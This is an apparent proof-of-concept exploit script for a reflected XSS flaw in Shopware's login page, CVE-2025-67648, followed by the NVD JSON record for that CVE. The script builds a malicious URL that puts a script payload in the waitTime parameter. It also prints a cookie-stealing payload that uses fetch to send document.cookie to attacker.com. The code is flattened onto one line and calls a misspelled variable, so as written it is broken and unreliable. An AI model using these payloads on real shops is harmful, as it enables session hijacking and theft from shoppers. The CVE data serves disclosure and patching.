CVE-2025-67648

# CVE-2025-67648 PoC - Reflected XSS in Shopware AuthController.php # Affected Versions: 6.4.6.0 - 6.6.10.9 and 6.7.0.0 - 6.7.5.0 # Fixed Versions: 6.6.10.10 and 6.7.5.1 import requests import urllib.parse target_url = "http://target-shopware-site.com/login" # Malicious payload for XSS injection via waitTime parameter xss_payload = '<script>alert(document.cookie)</script>' encoded_payload = urllib.parse.quote(xss_payload) # Construct malicious URL malicious_url = f"{target_url}?waitTime={encoded_payload}" print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") # Verify vulnerability exists response = requests.get(micious_url) if xss_payload in response.text: print("[+] VULNERABLE: XSS payload reflected in response") else: print("[-] Not vulnerable or patch already applied") # Steal cookie payload (for demonstration) cookie_steal_payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c=`+document.cookie)">' print(f"[*] Cookie stealing payload: {urllib.parse.quote(cookie_steal_payload)}")

{"cve": {"id": "CVE-2025-67648", "sourceIdentifier": "[email protected]", "published": "2025-12-11T00:16:23.557", "lastModified": "2026-03-17T19:43:54.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shopware is an open commerce platform. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 have a Reflected XSS vulnerability in AuthController.php. A request parameter from the login page URL is directly rendered within the Twig template of the Storefront login page without further processing or input validation. This allows direct code injection into the template via the URL parameter, waitTime, which lacks proper input validation. This issue is fixed in versions 6.6.10.10 and 6.7.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.6.0", "versionEndExcluding": "6.6.10.10", "matchCriteriaId": "F912C545-B472-43DB-8CAC-E9A5791D6E8B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7.0.0", "versionEndExcluding": "6.7.5.1", "matchCriteriaId": "5DBFD7B3-151A-46E7-81CE-30971D05FD21"}]}]}], "references": [{"url": "https://github.com/shopware/shopware/commit/c9242c02c84595d9fa3e2adf6a264bc90a657b58", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/shopware/shopware/security/advisories/GHSA-6w82-v552-wjw2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}